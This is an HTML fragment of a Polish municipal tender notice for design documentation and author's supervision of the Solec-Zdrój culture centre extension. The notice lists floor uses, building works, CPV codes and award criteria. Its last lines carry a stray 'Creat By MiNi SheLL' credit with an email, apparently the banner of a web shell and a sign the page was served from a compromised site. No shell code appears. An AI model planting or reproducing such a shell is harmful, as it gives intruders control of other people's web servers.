<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji dokumentacji projektowej - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na rozbudowę budynku Gminnego Centrum Kultury przy ul. Partyzantów w Solcu-Zdroju wraz z późniejszym sprawowaniem nadzoru autorskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje m.in.:
a) Opracowanie dokumentacji projektowej  wraz z opisem przedmiotu zamówienia na realizację prac dla rozbudowy budynku GCK przy ul. Partyzantów na potrzeby działalności GCK poprzez przebudowę budynku sąsiadującego znajdującego się w stanie surowym.
Projektowany budynek powinien posiadać 3 kondygnacje oraz około 400m2 powierzchni użytkowej.
Zakres prac projektowych:
W budynku należy zaprojektować niezbędne prace remontowo - adaptacyjne mające na celu przystosowanie budynku do pełnienia funkcji kulturalnych. 
Zakres dokumentacji  obejmuje także projekty aranżacji  pomieszczeń i wyposażenia
Przeznaczenie budynku:
1 kondygnacja - biblioteka publiczna wraz z systemem zarządzania zbiorami,
2 kondygnacja - sala wystawiennicza. Ponadto sala wystawiennicza powinna umożliwiać prowadzenie konferencji, być wyposażona w odpowiedni sprzęt multimedialny (m.in. rzutnik, ekran chowany w suficie, nagłośnienie),
3 kondygnacja - pomieszczenia na potrzeby działalności GCK w tym sala ćwiczeń zespołów muzycznych z odpowiednim wyciszeniem, wyposażona w pianino.
Zakres robót adaptacyjnych powinien przewidywać:
- prace rozbiórkowe,
- przebudowę ścian i fundamentów,
- budowę wejścia na poziomie terenu,
- montaż instalacji co, cwu, wod-kan, elektrycznej i teletechnicznej, wentylacji i klimatyzacji,
- zakup i montaż stolarki okiennej i drzwiowej,
- tynkowanie i malowanie ścian,
- wykonanie warstw wyrównawczych i posadzek,
- roboty malarskie wewnętrzne wraz z wyrównaniem podłoży (ściany + sufity),
- wykonanie dachu,
- wykonanie orynnowania,
- dostawa i montaż windy, umożliwiające korzystanie z zarówno części /starej/ jak i /nowej/ budynku GCK,
- ocieplenie ścian zewnętrznych oraz roboty wykończeniowe elewacji,
- zakup wyposażenia obiektu (stoły, szafki, krzesła, sprzęt komputerowy itp.)
Budynek należy przystosować dla potrzeb osób niepełnosprawnych.
Dokumentacja zawierać będzie również projekt zagospodarowania terenu.
b) Sprawowanie nadzoru autorskiego zgodnie z ustawą Prawo Budowlane oraz udzielanie odpowiedzi na pytania kierowane przez Zamawiającego lub Wykonawców robót związane z dokumentacją projektową. Nadzór autorski w trakcie realizacji robót budowlanych obejmuje 15 pobytów projektanta na inwestycji. W przypadku gdy w trakcie prowadzenia robót nie będzie takiej potrzeby ilość  pobytów może być się mniejsza iż zakładane 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.20.00.00-0, 71.21.00.00-3, 71.22.00.00-6, 71.22.10.00-3, 71.24.20.00-6, 71.24.60.00-4, 71.24.50.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji dokumentacji projektowej - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com